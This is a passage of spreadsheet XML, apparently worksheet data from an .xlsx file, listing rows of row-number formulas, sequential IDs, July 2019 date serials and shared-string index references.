      <c r="A8790">
        <f t="shared" si="137"/>
        <v>8789</v>
      </c>
      <c r="B8790">
        <v>3789</v>
      </c>
      <c r="C8790" t="s">
        <v>9973</v>
      </c>
      <c r="D8790" s="1">
        <v>43671</v>
      </c>
      <c r="E8790" t="s">
        <v>17262</v>
      </c>
      <c r="F8790" t="s">
        <v>9975</v>
      </c>
      <c r="G8790" t="s">
        <v>17263</v>
      </c>
    </row>
    <row r="8791" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8791">
        <f t="shared" si="137"/>
        <v>8790</v>
      </c>
      <c r="B8791">
        <v>3790</v>
      </c>
      <c r="C8791" t="s">
        <v>9973</v>
      </c>
      <c r="D8791" s="1">
        <v>43674</v>
      </c>
      <c r="E8791" t="s">
        <v>17264</v>
      </c>
      <c r="F8791" t="s">
        <v>9975</v>
      </c>
      <c r="G8791" t="s">
        <v>17265</v>
      </c>
    </row>
    <row r="8792" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8792">
        <f t="shared" si="137"/>
        <v>8791</v>
      </c>
      <c r="B8792">
        <v>3791</v>
      </c>
      <c r="C8792" t="s">
        <v>9973</v>
      </c>
      <c r="D8792" s="1">
        <v>43676</v>
      </c>
      <c r="E8792" t="s">
        <v>17266</v>
      </c>
      <c r="F8792" t="s">
        <v>9975</v>
      </c>
      <c r="G8792" t="s">
        <v>17267</v>
      </c>
    </row>
    <row r="8793" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8793">
        <f t="shared" si="137"/>
        <v>8792</v>
      </c>
      <c r="B8793">
        <v>3792</v>
      </c>
      <c r="C8793" t="s">
        <v>9973</v>
      </c>
      <c r="D8793" s="1">
        <v>43677</v>
      </c>
      <c r="E8793" t="s">
        <v>17268</v>
      </c>
      <c r="F8793" t="s">
        <v>9975</v>
      </c>
      <c r="G8793" t="s">
        <v>17269</v>
      </c>
    </row>
    <row r="8794" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8794">
        <f t="shared" si="137"/>
        <v>8793</v>
      </c>
      <c r="B8794">
        <v>3793</v>
      </c>
      <c r="C8794" t="s">
        <v>9973</v>
      </c>
      <c r="D8794" s="1">
        <v>43673</v>
      </c>
      <c r="E8794" t="s">
        <v>17270</v>
      </c>
      <c r="F8794" t="s">
        <v>9975</v>
      </c>
      <c r="G8794" t="s">
        <v>17271</v>
      </c>
    </row>
    <row r="8795" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8795">
        <f t="shared" si="137"/>
        <v>8794</v>
      </c>
      <c r="B8795">
        <v>3794</v>
      </c>
      <c r="C8795" t="s">
        <v>9973</v>
      </c>
      <c r="D8795" s="1">
        <v>43671</v>
      </c>
      <c r="E8795" t="s">
        <v>17272</v>
      </c>
      <c r="F8795" t="s">
        <v>9975</v>
      </c>
      <c r="G8795" t="s">
        <v>17273</v>
      </c>
    </row>
    <row r="8796" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8796">
        <f t="shared" si="137"/>
        <v>8795</v>
      </c>
      <c r="B8796">
        <v>3795</v>
      </c>
      <c r="C8796" t="s">
        <v>9973</v>
      </c>
      <c r="D8796" s="1">
        <v>43669</v>
      </c>
      <c r="E8796" t="s">
        <v>17274</v>
      </c>
      <c r="F8796" t="s">
        <v>9975</v>
      </c>
      <c r="G8796" t="s">
        <v>17275</v>
      </c>
    </row>
    <row r="8797" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8797">
        <f t="shared" si="137"/>
        <v>8796</v>
      </c>
      <c r="B8797">
        <v>3796</v>
      </c>
      <c r="C8797" t="s">
        <v>9973</v>
      </c>
      <c r="D8797" s="1">
        <v>43675</v>
      </c>
      <c r="E8797" t="s">
        <v>17276</v>
      </c>
      <c r="F8797" t="s">
        <v>9975</v>
      </c>
      <c r="G8797" t="s">
        <v>17277</v>
      </c>
    </row>
    <row r="8798" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8798">
        <f t="shared" si="137"/>
        <v>8797</v>
      </c>
      <c r="B8798">
        <v>3797</v>
      </c>
      <c r="C8798" t="s">
        <v>9973</v>
      </c>
      <c r="D8798" s="1">
        <v>43677</v>
      </c>
      <c r="E8798" t="s">
        <v>17278</v>
      </c>
      <c r="F8798" t="s">
        <v>9975</v>
      </c>
      <c r="G8798" t="s">
        <v>17279</v>
      </c>
    </row>
    <row r="8799" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8799">
        <f t="shared" si="137"/>
        <v>8798</v>
      </c>
      <c r="B8799">
        <v>3798</v>
      </c>
      <c r="C8799" t="s">
        <v>9973</v>
      </c>
      <c r="D8799" s="1">
        <v>43674</v>
      </c>
      <c r="E8799" t="s">
        <v>17280</v>
      </c>
      <c r="F8799" t="s">
        <v>9975</v>
      </c>
      <c r="G8799" t="s">
        <v>17281</v>
      </c>
    </row>
    <row r="8800" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8800">
        <f t="shared" si="137"/>
        <v>8799</v>
      </c>
      <c r="B8800">
        <v>3799</v>
      </c>
      <c r="C8800" t="s">
        <v>9973</v>
      </c>
      <c r="D8800" s="1">
        <v>43668</v>
      </c>
      <c r="E8800" t="s">
        <v>17282</v>
      </c>
      <c r="F8800" t="s">
        <v>9975</v>
      </c>
      <c r="G8800" t="s">
        <v>17283</v>
      </c>
    </row>
    <row r="8801" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8801">
        <f t="shared" si="137"/>
        <v>8800</v>
      </c>
      <c r="B8801">
        <v>3800</v>
      </c>
      <c r="C8801" t="s">
        <v>9973</v>
      </c>
      <c r="D8801" s="1">
        <v>43669</v>
      </c>
      <c r="E8801" t="s">
        <v>17284</v>
      </c>
      <c r="F8801" t="s">
        <v>9975</v>
      </c>
      <c r="G8801" t="s">
        <v>17285</v>
      </c>
    </row>
    <row r="8802" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8802">
        <f t="shared" si="137"/>
        <v>8801</v>
      </c>
      <c r="B8802">
        <v>3801</v>
      </c>
      <c r="C8802" t="s">
        <v>9973</v>
      </c>
      <c r="D8802" s="1">
        <v>43668</v>
      </c>
      <c r="E8802" t="s">
        <v>17286</v>
      </c>
      <c r="F8802" t="s">
        <v>9975</v>
      </c>
      <c r="G8802" t="s">
        <v>17287</v>
      </c>
    </row>
    <row r="8803" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8803">
        <f t="shared" si="137"/>
        <v>8802</v>
      </c>
      <c r="B8803">
        <v>3802</v>
      </c>
      <c r="C8803" t="s">
        <v>9973</v>
      </c>
      <c r="D8803" s="1">
        <v>43668</v>
      </c>
      <c r="E8803" t="s">
        <v>17288</v>
      </c>
      <c r="F8803" t="s">
        <v>9975</v>
      </c>
      <c r="G8803" t="s">
        <v>17289</v>
      </c>
    </row>
    <row r="8804" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8804">
        <f t="shared" si="137"/>
        <v>8803</v>
      </c>
      <c r="B8804">
        <v>3803</v>
      </c>
      <c r="C8804" t="s">
        <v>9973</v>
      </c>
      <c r="D8804" s="1">
        <v>43673</v>
      </c>
      <c r="E8804" t="s">
        <v>17290</v>
      </c>
      <c r="F8804" t="s">
        <v>9975</v>
      </c>
      <c r="G8804" t="s">
        <v>17291</v>
      </c>
    </row>
    <row r="8805" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8805">
        <f t="shared" si="137"/>
        <v>8804</v>
      </c>
      <c r="B8805">
        <v>3804</v>
      </c>
      <c r="C8805" t="s">
        <v>9973</v>
      </c>
      <c r="D8805" s="1">
        <v>43671</v>
      </c>
      <c r="E8805" t="s">
        <v>17292</v>
      </c>
      <c r="F8805" t="s">
        <v>9975</v>
      </c>
      <c r="G8805" t="s">
        <v>17293</v>
      </c>
    </row>
    <row r="8806" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8806">
        <f t="shared" si="137"/>
        <v>8805</v>
      </c>
      <c r="B8806">
        <v>3805</v>
      </c>
      <c r="C8806" t="s">
        <v>9973</v>
      </c>
      <c r="D8806" s="1">
        <v>43677</v>
      </c>
      <c r="E8806" t="s">
        <v>17294</v>
      </c>
      <c r="F8806" t="s">
        <v>9975</v>
      </c>
      <c r="G8806" t="s">
        <v>17295</v>
      </c>
    </row>
    <row r="8807" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8807">
        <f t="shared" si="137"/>
        <v>8806</v>
      </c>
      <c r="B8807">
        <v>3806</v>
      </c>
      <c r="C8807" t="s">
        <v>9973</v>
      </c>
      <c r="D8807" s="1">
        <v>43669</v>
      </c>
      <c r="E8807" t="s">
        <v>17296</v>
      </c>
      <c r="F8807" t="s">
        <v>10021</v>
      </c>
      <c r="G8807" t="s">
        <v>17297</v>
      </c>
    </row>
    <row r="8808" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8808">
        <f t="shared" si="137"/>
        <v>8807</v>
      </c>
      <c r="B8808">
        <v>3807</v>
      </c>
      <c r="C8808" t="s">
        <v>9973</v>
      </c>
      <c r="D8808" s="1">
        <v>43677</v>
      </c>
      <c r="E8808" t="s">
        <v>17298</v>
      </c>
      <c r="F8808" t="s">
        <v>9975</v>
      </c>
      <c r="G8808" t="s">
        <v>17299</v>
      </c>
    </row>
    <row r="8809" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8809">
        <f t="shared" si="137"/>
        <v>8808</v>
      </c>
      <c r="B8809">
        <v>3808</v>
      </c>
      <c r="C8809" t="s">
        <v>9973</v>
      </c>
      <c r="D8809" s="1">
        <v>43669</v>
      </c>
      <c r="E8809" t="s">
        <v>17300</v>
      </c>
      <c r="F8809" t="s">
        <v>9975</v>
      </c>
      <c r="G8809" t="s">
        <v>17301</v>
      </c>
    </row>
    <row r="8810" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8810">
        <f t="shared" si="137"/>
        <v>8809</v>
      </c>
      <c r="B8810">
        <v>3809</v>
      </c>
      <c r="C8810" t="s">
        <v>9973</v>
      </c>
      <c r="D8810" s="1">
        <v>43676</v>
      </c>
      <c r="E8810" t="s">
        <v>17302</v>
      </c>
      <c r="F8810" t="s">
        <v>9975</v>
      </c>
      <c r="G8810" t="s">
        <v>17303</v>
      </c>
    </row>
    <row r="8811" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8811">
        <f t="shared" si="137"/>
        <v>8810</v>
      </c>
      <c r="B8811">
        <v>3810</v>
      </c>
      <c r="C8811" t="s">
        <v>9973</v>
      </c>
      <c r="D8811" s="1">
        <v>43675</v>
      </c>
      <c r="E8811" t="s">
        <v>17304</v>
      </c>
      <c r="F8811" t="s">
        <v>9975</v>
      </c>
      <c r="G8811" t="s">
        <v>17305</v>
      </c>
    </row>
    <row r="8812" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8812">
        <f t="shared" si="137"/>
        <v>8811</v>
      </c>
      <c r="B8812">
        <v>3811</v>
      </c>
      <c r="C8812" t="s">
        <v>9973</v>
      </c>
      <c r="D8812" s="1">
        <v>43668</v>
      </c>
      <c r="E8812" t="s">
        <v>17306</v>
      </c>
      <c r="F8812" t="s">
        <v>9975</v>
      </c>
      <c r="G8812" t="s">
        <v>17307</v>
      </c>
    </row>
    <row r="8813" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8813">
        <f t="shared" si="137"/>
        <v>8812</v>
      </c>
      <c r="B8813">
        <v>3812</v>
      </c>
      <c r="C8813" t="s">
        <v>9973</v>
      </c>
      <c r="D8813" s="1">
        <v>43672</v>
      </c>
      <c r="E8813" t="s">
        <v>17308</v>
      </c>
      <c r="F8813" t="s">
        <v>9975</v>
      </c>
      <c r="G8813" t="s">
        <v>17309</v>
      </c>
    </row>
    <row r="8814" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8814">
        <f t="shared" si="137"/>
        <v>8813</v>
      </c>
      <c r="B8814">
        <v>3813</v>
      </c>
      <c r="C8814" t="s">
        <v>9973</v>
      </c>
      <c r="D8814" s="1">
        <v>43671</v>
      </c>
      <c r="E8814" t="s">
        <v>17310</v>
      </c>
      <c r="F8814" t="s">
        <v>9975</v>
      </c>
      <c r="G8814" t="s">
        <v>17311</v>
      </c>
    </row>
    <row r="8815" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8815">
        <f t="shared" si="137"/>
        <v>8814</v>
      </c>
      <c r="B8815">
        <v>3814</v>
      </c>
      <c r="C8815" t="s">
        <v>9973</v>
      </c>
      <c r="D8815" s="1">
        <v>43670</v>
      </c>
      <c r="E8815" t="s">
        <v>17312</v>
      </c>
      <c r="F8815" t="s">
        <v>9975</v>
      </c>
      <c r="G8815" t="s">
        <v>17313</v>
      </c>
    </row>
    <row r="8816" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8816">
        <f t="shared" si="137"/>
        <v>8815</v>
      </c>
      <c r="B8816">
        <v>3815</v>
      </c>
      <c r="C8816" t="s">
        <v>9973</v>
      </c>
      <c r="D8816" s="1">
        <v>43674</v>
      </c>
      <c r="E8816" t="s">
        <v>17314</v>
      </c>
      <c r="F8816" t="s">
        <v>9975</v>
      </c>
      <c r="G8816" t="s">
        <v>17315</v>
      </c>
    </row>
    <row r="8817" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8817">
        <f t="shared" si="137"/>
        <v>8816</v>
      </c>
      <c r="B8817">
        <v>3816</v>
      </c>
      <c r="C8817" t="s">
        <v>9973</v>
      </c>
      <c r="D8817" s="1">
        <v>43672</v>
      </c>
      <c r="E8817" t="s">
        <v>17316</v>
      </c>
      <c r="F8817" t="s">
        <v>9975</v>
      </c>
      <c r="G8817" t="s">
        <v>17317</v>
      </c>
    </row>
    <row r="8818" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8818">
        <f t="shared" si="137"/>
        <v>8817</v>
      </c>
      <c r="B8818">
        <v>3817</v>
      </c>
      <c r="C8818" t="s">
        <v>9973</v>
      </c>
      <c r="D8818" s="1">
        <v>43668</v>
      </c>
      <c r="E8818" t="s">
        <v>17318</v>
      </c>
      <c r="F8818" t="s">
        <v>9975</v>
      </c>
      <c r="G8818" t="s">
        <v>17319</v>
      </c>
    </row>
    <row r="8819" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8819">
        <f t="shared" si="137"/>
        <v>8818</v>
      </c>
      <c r="B8819">
        <v>3818</v>
      </c>
      <c r="C8819" t="s">
        <v>9973</v>
      </c>
      <c r="D8819" s="1">
        <v>43676</v>
      </c>
      <c r="E8819" t="s">
        <v>17320</v>
      </c>
      <c r="F8819" t="s">
        <v>9975</v>
      </c>
      <c r="G8819" t="s">
        <v>17321</v>
      </c>
    </row>
    <row r="8820" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8820">
        <f t="shared" si="137"/>
        <v>8819</v>
      </c>
      <c r="B8820">
        <v>3819</v>
      </c>
      <c r="C8820" t="s">
        <v>9973</v>
      </c>
      <c r="D8820" s="1">
        <v>43672</v>
      </c>
      <c r="E8820" t="s">
        <v>17322</v>
      </c>
      <c r="F8820" t="s">
        <v>9975</v>
      </c>
      <c r="G8820" t="s">
        <v>17323</v>
      </c>
    </row>
    <row r="8821" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8821">
        <f t="shared" si="137"/>
        <v>8820</v>
      </c>
      <c r="B8821">
        <v>3820</v>
      </c>
      <c r="C8821" t="s">
        <v>9973</v>
      </c>
      <c r="D8821" s="1">
        <v>43671</v>
      </c>
      <c r="E8821" t="s">
        <v>17324</v>
      </c>
      <c r="F8821" t="s">
        <v>9975</v>
      </c>
      <c r="G8821" t="s">
        <v>17325</v>
      </c>
    </row>
    <row r="8822" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8822">
        <f t="shared" si="137"/>
        <v>8821</v>
      </c>
      <c r="B8822">
        <v>3821</v>
      </c>
      <c r="C8822" t="s">
        <v>9973</v>
      </c>
      <c r="D8822" s="1">
        <v>43677</v>
      </c>
      <c r="E8822" t="s">
        <v>17326</v>
      </c>
      <c r="F8822" t="s">
        <v>9975</v>
      </c>
      <c r="G8822" t="s">
        <v>17327</v>
      </c>
    </row>
    <row r="8823" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8823">
        <f t="shared" si="137"/>
        <v>8822</v>
      </c>
      <c r="B8823">
        <v>3822</v>
      </c>
      <c r="C8823" t="s">
        <v>9973</v>
      </c>
      <c r="D8823" s="1">
        <v>43672</v>
      </c>
      <c r="E8823" t="s">
        <v>17328</v>
      </c>
      <c r="F8823" t="s">
        <v>10526</v>
      </c>
      <c r="G8823" t="s">
        <v>17329</v>
      </c>
    </row>
    <row r="8824" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8824">
        <f t="shared" si="137"/>
        <v>8823</v>
      </c>
      <c r="B8824">
        <v>3823</v>
      </c>
      <c r="C8824" t="s">
        <v>9973</v>
      </c>
      <c r="D8824" s="1">
        <v>43670</v>
      </c>
      <c r="E8824" t="s">
        <v>17330</v>
      </c>
      <c r="F8824" t="s">
        <v>9975</v>
      </c>
      <c r="G8824" t="s">
        <v>17331</v>
      </c>
    </row>
    <row r="8825" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8825">
        <f t="shared" si="137"/>
        <v>8824</v>
      </c>
      <c r="B8825">
        <v>3824</v>
      </c>
      <c r="C8825" t="s">
        <v>9973</v>
      </c>
      <c r="D8825" s="1">
        <v>43673</v>
      </c>
      <c r="E8825" t="s">
        <v>17332</v>
      </c>
      <c r="F8825" t="s">
        <v>9975</v>
      </c>
      <c r="G8825" t="s">
        <v>17333</v>
      </c>
    </row>
    <row r="8826" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8826">
        <f t="shared" si="137"/>
        <v>8825</v>
      </c>
      <c r="B8826">
        <v>3825</v>
      </c>
      <c r="C8826" t="s">
        <v>9973</v>
      </c>
      <c r="D8826" s="1">
        <v>43677</v>
      </c>
      <c r="E8826" t="s">
        <v>17334</v>
      </c>
      <c r="F8826" t="s">
        <v>9975</v>
      </c>
      <c r="G8826" t="s">
        <v>17335</v>
      </c>
    </row>
    <row r="8827" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8827">
        <f t="shared" si="137"/>
        <v>8826</v>
      </c>
      <c r="B8827">
        <v>3826</v>
      </c>
      <c r="C8827" t="s">
        <v>9973</v>
      </c>
      <c r="D8827" s="1">
        <v>43669</v>
      </c>
      <c r="E8827" t="s">
        <v>17336</v>
      </c>
      <c r="F8827" t="s">
        <v>9975</v>
      </c>
      <c r="G8827" t="s">
        <v>17337</v>
      </c>
    </row>
    <row r="8828" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8828">
        <f t="shared" si="137"/>
        <v>8827</v>
      </c>
      <c r="B8828">
        <v>3827</v>
      </c>
      <c r="C8828" t="s">
        <v>9973</v>
      </c>
      <c r="D8828" s="1">
        <v>43674</v>
      </c>
      <c r="E8828" t="s">
        <v>17338</v>
      </c>
      <c r="F8828" t="s">
        <v>9975</v>
      </c>
      <c r="G8828" t="s">
        <v>17339</v>
      </c>
    </row>
    <row r="8829" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8829">
        <f t="shared" si="137"/>
        <v>8828</v>
      </c>
      <c r="B8829">
        <v>3828</v>
      </c>
      <c r="C8829" t="s">
        <v>9973</v>
      </c>
      <c r="D8829" s="1">
        <v>43677</v>
      </c>
      <c r="E8829" t="s">
        <v>17340</v>
      </c>
      <c r="F8829" t="s">
        <v>9975</v>
      </c>
      <c r="G8829" t="s">
        <v>17341</v>
      </c>
    </row>
    <row r="8830" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8830">
        <f t="shared" si="137"/>
        <v>8829</v>
      </c>
      <c r="B8830">
        <v>3829</v>
      </c>
      <c r="C8830" t="s">
        <v>9973</v>
      </c>
      <c r="D8830" s="1">
        <v>43669</v>
      </c>
      <c r="E8830" t="s">
        <v>17342</v>
      </c>
      <c r="F8830" t="s">
        <v>10526</v>
      </c>
      <c r="G8830" t="s">
        <v>17343</v>
      </c>
    </row>
    <row r="8831" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8831">
        <f t="shared" si="137"/>
        <v>8830</v>
      </c>
      <c r="B8831">
        <v>3830</v>
      </c>
      <c r="C8831" t="s">
        <v>9973</v>
      </c>
      <c r="D8831" s="1">
        <v>43671</v>
      </c>
      <c r="E8831" t="s">
        <v>17344</v>
      </c>
      <c r="F8831" t="s">
        <v>9975</v>
      </c>
      <c r="G8831" t="s">
        <v>17345</v>
      </c>
    </row>
    <row r="8832" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8832">
        <f t="shared" si="137"/>
        <v>8831</v>
      </c>
      <c r="B8832">
        <v>3831</v>
      </c>
      <c r="C8832" t="s">
        <v>9973</v>
      </c>
      <c r="D8832" s="1">
        <v>43677</v>
      </c>
      <c r="E8832" t="s">
        <v>17346</v>
      </c>
      <c r="F8832" t="s">
        <v>9975</v>
      </c>
      <c r="G8832" t="s">
        <v>17347</v>
      </c>
    </row>
    <row r="8833" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8833">
        <f t="shared" si="137"/>
        <v>8832</v>
      </c>
      <c r="B8833">
        <v>3832</v>
      </c>
      <c r="C8833" t="s">
        <v>9973</v>
      </c>
      <c r="D8833" s="1">
        <v>43675</v>
      </c>
      <c r="E8833" t="s">
        <v>17348</v>
      </c>
      <c r="F8833" t="s">
        <v>9975</v>
      </c>
    </row>
    <row r="8834" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8834">
        <f t="shared" si="137"/>
        <v>8833</v>
      </c>
      <c r="B8834">
        <v>3833</v>
      </c>
      <c r="C8834" t="s">
        <v>9973</v>
      </c>
      <c r="D8834" s="1">
        <v>43674</v>
      </c>
      <c r="E8834" t="s">
        <v>17349</v>
      </c>
      <c r="F8834" t="s">
        <v>9975</v>
      </c>
      <c r="G8834" t="s">
        <v>17350</v>
      </c>
    </row>
    <row r="8835" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8835">
        <f t="shared" ref="A8835:A8898" si="138">+ROW(A8834)</f>
        <v>8834</v>
      </c>
      <c r="B8835">
        <v>3834</v>
      </c>
      <c r="C8835" t="s">
        <v>9973</v>
      </c>
      <c r="D8835" s="1">
        <v>43675</v>
      </c>
      <c r="E8835" t="s">
        <v>17351</v>
      </c>
      <c r="F8835" t="s">
        <v>9975</v>
      </c>
      <c r="G8835" t="s">
        <v>17352</v>
      </c>
    </row>
    <row r="8836" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8836">
        <f t="shared" si="138"/>
        <v>8835</v>
      </c>
      <c r="B8836">
        <v>3835</v>
      </c>
      <c r="C8836" t="s">
        <v>9973</v>
      </c>
      <c r="D8836" s="1">
        <v>43668</v>
      </c>
      <c r="E8836" t="s">
        <v>17353</v>
      </c>
      <c r="F8836" t="s">
        <v>9975</v>
      </c>
      <c r="G8836" t="s">
        <v>17354</v>
      </c>
    </row>
    <row r="8837" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8837">
        <f t="shared" si="138"/>
        <v>8836</v>
      </c>
      <c r="B8837">
        <v>3836</v>
      </c>
      <c r="C8837" t="s">
        <v>9973</v>
      </c>
      <c r="D8837" s="1">
        <v>43671</v>
      </c>
      <c r="E8837" t="s">
        <v>17355</v>
      </c>
      <c r="F8837" t="s">
        <v>9975</v>
      </c>
      <c r="G8837" t="s">
        <v>17356</v>
      </c>
    </row>
    <row r="8838" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8838">
        <f t="shared" si="138"/>
        <v>8837</v>
      </c>
      <c r="B8838">
        <v>3837</v>
      </c>
      <c r="C8838" t="s">
        <v>9973</v>
      </c>
      <c r="D8838" s="1">
        <v>43670</v>
      </c>
      <c r="E8838" t="s">
        <v>17357</v>
      </c>
      <c r="F8838" t="s">
        <v>9975</v>
      </c>
      <c r="G8838" t="s">
        <v>17358</v>
      </c>
    </row>
    <row r="8839" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8839">
        <f t="shared" si="138"/>
        <v>8838</v>
      </c>
      <c r="B8839">
        <v>3838</v>
      </c>
      <c r="C8839" t="s">
        <v>9973</v>
      </c>
      <c r="D8839" s="1">
        <v>43675</v>
      </c>
      <c r="E8839" t="s">
        <v>10018</v>
      </c>
      <c r="F8839" t="s">
        <v>9975</v>
      </c>
      <c r="G8839" t="s">
        <v>17359</v>
      </c>
    </row>
    <row r="8840" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8840">
        <f t="shared" si="138"/>
        <v>8839</v>
      </c>
      <c r="B8840">
        <v>3839</v>
      </c>
      <c r="C8840" t="s">
        <v>9973</v>
      </c>
      <c r="D8840" s="1">
        <v>43674</v>
      </c>
      <c r="E8840" t="s">
        <v>10099</v>
      </c>
      <c r="F8840" t="s">
        <v>9975</v>
      </c>
      <c r="G8840" t="s">
        <v>17360</v>
      </c>
    </row>
    <row r="8841" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8841">
        <f t="shared" si="138"/>
        <v>8840</v>
      </c>
      <c r="B8841">
        <v>3840</v>
      </c>
      <c r="C8841" t="s">
        <v>9973</v>
      </c>
      <c r="D8841" s="1">
        <v>43672</v>
      </c>
      <c r="E8841" t="s">
        <v>17361</v>
      </c>
      <c r="F8841" t="s">
        <v>9975</v>
      </c>
      <c r="G8841" t="s">
        <v>17362</v>
      </c>
    </row>
    <row r="8842" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8842">
        <f t="shared" si="138"/>
        <v>8841</v>
      </c>
      <c r="B8842">
        <v>3841</v>
      </c>
      <c r="C8842" t="s">
        <v>9973</v>
      </c>
      <c r="D8842" s="1">
        <v>43670</v>
      </c>
      <c r="E8842" t="s">
        <v>17363</v>
      </c>
      <c r="F8842" t="s">
        <v>9975</v>
      </c>
      <c r="G8842" t="s">
        <v>17364</v>
      </c>
    </row>
    <row r="8843" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8843">
        <f t="shared" si="138"/>
        <v>8842</v>
      </c>
      <c r="B8843">
        <v>3842</v>
      </c>
      <c r="C8843" t="s">
        <v>9973</v>
      </c>
      <c r="D8843" s="1">
        <v>43677</v>
      </c>
      <c r="E8843" t="s">
        <v>17365</v>
      </c>
      <c r="F8843" t="s">
        <v>9975</v>
      </c>
      <c r="G8843" t="s">
        <v>17366</v>
      </c>
    </row>
    <row r="8844" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8844">
        <f t="shared" si="138"/>
        <v>8843</v>
      </c>
      <c r="B8844">
        <v>3843</v>
      </c>
      <c r="C8844" t="s">
        <v>9973</v>
      </c>
      <c r="D8844" s="1">
        <v>43673</v>
      </c>
      <c r="E8844" t="s">
        <v>17367</v>
      </c>
      <c r="F8844" t="s">
        <v>9975</v>
      </c>
      <c r="G8844" t="s">
        <v>17368</v>
      </c>
    </row>
    <row r="8845" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8845">
        <f t="shared" si="138"/>
        <v>8844</v>
      </c>
      <c r="B8845">
        <v>3844</v>
      </c>
      <c r="C8845" t="s">
        <v>9973</v>
      </c>
      <c r="D8845" s="1">
        <v>43677</v>
      </c>
      <c r="E8845" t="s">
        <v>17369</v>
      </c>
      <c r="F8845" t="s">
        <v>9975</v>
      </c>
      <c r="G8845" t="s">
        <v>17370</v>
      </c>
    </row>
    <row r="8846" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8846">
        <f t="shared" si="138"/>
        <v>8845</v>
      </c>
      <c r="B8846">
        <v>3845</v>
      </c>
      <c r="C8846" t="s">
        <v>9973</v>
      </c>
      <c r="D8846" s="1">
        <v>43671</v>
      </c>
      <c r="E8846" t="s">
        <v>17371</v>
      </c>
      <c r="F8846" t="s">
        <v>9975</v>
      </c>
      <c r="G8846" t="s">
        <v>17372</v>
      </c>
    </row>
    <row r="8847" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8847">
        <f t="shared" si="138"/>
        <v>8846</v>
      </c>
      <c r="B8847">
        <v>3846</v>
      </c>
      <c r="C8847" t="s">
        <v>9973</v>
      </c>
      <c r="D8847" s="1">
        <v>43676</v>
      </c>
      <c r="E8847" t="s">
        <v>17373</v>
      </c>
      <c r="F8847" t="s">
        <v>9975</v>
      </c>
      <c r="G8847" t="s">
        <v>17374</v>
      </c>
    </row>
    <row r="8848" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8848">
        <f t="shared" si="138"/>
        <v>8847</v>
      </c>
      <c r="B8848">
        <v>3847</v>
      </c>
      <c r="C8848" t="s">
        <v>9973</v>
      </c>
      <c r="D8848" s="1">
        <v>43673</v>
      </c>
      <c r="E8848" t="s">
        <v>17375</v>
      </c>
      <c r="F8848" t="s">
        <v>9975</v>
      </c>
      <c r="G8848" t="s">
        <v>17376</v>
      </c>
    </row>
    <row r="8849" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8849">
        <f t="shared" si="138"/>
        <v>8848</v>
      </c>
      <c r="B8849">
        <v>3848</v>
      </c>
      <c r="C8849" t="s">
        <v>9973</v>
      </c>
      <c r="D8849" s="1">
        <v>43676</v>
      </c>
      <c r="E8849" t="s">
        <v>17377</v>
      </c>
      <c r="F8849" t="s">
        <v>9975</v>
      </c>
      <c r="G8849" t="s">
        <v>17378</v>
      </c>
    </row>
    <row r="8850" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8850">
        <f t="shared" si="138"/>
        <v>8849</v>
      </c>
      <c r="B8850">
        <v>3849</v>
      </c>
      <c r="C8850" t="s">
        <v>9973</v>
      </c>
      <c r="D8850" s="1">
        <v>43673</v>
      </c>
      <c r="E8850" t="s">
        <v>17379</v>
      </c>
      <c r="F8850" t="s">
        <v>9975</v>
      </c>
      <c r="G8850" t="s">
        <v>17380</v>
      </c>
    </row>
    <row r="8851" spans="1:7" x14ac:dyDescent="0.35">
